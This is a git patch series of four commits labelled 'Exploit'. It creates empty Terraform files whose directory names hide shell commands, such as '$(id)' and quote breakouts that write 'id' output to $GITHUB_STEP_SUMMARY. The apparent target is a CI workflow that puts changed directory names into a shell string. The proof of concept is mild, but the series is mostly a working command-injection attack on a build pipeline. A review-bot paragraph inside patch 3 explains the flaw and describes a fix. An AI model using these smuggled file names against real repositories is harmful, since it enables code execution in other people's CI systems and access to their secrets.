From f01c4e0c7102ae396eda99ab630cd2575f107c9e Mon Sep 17 00:00:00 2001
From: OxBat
Date: Thu, 8 Jan 2026 03:11:07 +0100
Subject: [PATCH 1/4] Exploit: RCE verification

---
infrastructure/$(id)/terraform/main.tf | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 infrastructure/$(id)/terraform/main.tf

diff --git a/infrastructure/$(id)/terraform/main.tf b/infrastructure/$(id)/terraform/main.tf
new file mode 100644
index 0000000..e69de29

From 99559ded488763cff528fc78608c9c88558a0474 Mon Sep 17 00:00:00 2001
From: OxBat
Date: Thu, 8 Jan 2026 03:15:19 +0100
Subject: [PATCH 2/4] Exploit: Add missing tfvars to reach the sink

---
infrastructure/$(id)/terraform/terraform.tfvars | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 infrastructure/$(id)/terraform/terraform.tfvars

diff --git a/infrastructure/$(id)/terraform/terraform.tfvars b/infrastructure/$(id)/terraform/terraform.tfvars
new file mode 100644
index 0000000..e69de29

From d75c30f4d821be3e9d6f4957fba33ab3a36817cd Mon Sep 17 00:00:00 2001
From: OxBat
Date: Thu, 8 Jan 2026 03:25:56 +0100
Subject: [PATCH 3/4] Exploit: Command injection via quote breakout

---
.../\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" | 0
.../terraform/terraform.tfvars" | 0
2 files changed, 0 insertions(+), 0 deletions(-)
rename infrastructure/$(id)/terraform/main.tf => "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" (100%)
rename infrastructure/$(id)/terraform/terraform.tfvars => "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars" (100%)

diff --git a/infrastructure/$(id)/terraform/main.tf "b/infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf"
similarity index 100%
rename from infrastructure/$(id)/terraform/main.tf
rename to "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf"
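Review bot: The directory component of every path in this series carries shell syntax (`$(id)` in patches 1 and 2, a `\"` followed by `id >> $GITHUB_STEP_SUMMARY` in patches 3 and 4), while the files themselves are empty (blob `e69de29`), so the path name is the entire change. The commit subjects indicate the target is a workflow step that places a changed directory name inside a double-quoted shell string; that workflow is not on this page, so this is inferred. The fix belongs in that step: hand the name to the script through `env:` and expand it as `"$DIR"` rather than templating it into `run:`, and reject any name that does not match an allowlist such as `^[A-Za-z0-9._-]+$` before a command uses it. A repository check that fails on tracked paths outside that pattern would also surface this kind of pull request at review time.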
diff --git a/infrastructure/$(id)/terraform/terraform.tfvars "b/infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars"
similarity index 100%
rename from infrastructure/$(id)/terraform/terraform.tfvars
rename to "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars"

From 1c0d1c1a8bf415cd090224e1732a1fa5dacf0b69 Mon Sep 17 00:00:00 2001
From: OxBat
Date: Thu, 8 Jan 2026 03:29:41 +0100
Subject: [PATCH 4/4] Exploit: Final quote breakout for RCE

---
.../poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" | 0
.../terraform/terraform.tfvars" | 0
2 files changed, 0 insertions(+), 0 deletions(-)
create mode 100644 "infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf"
create mode 100644 "infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars"

diff --git "a/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" "b/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf"
new file mode 100644
index 0000000..e69de29
diff --git "a/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars" "b/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars"
new file mode 100644
index 0000000..e69de29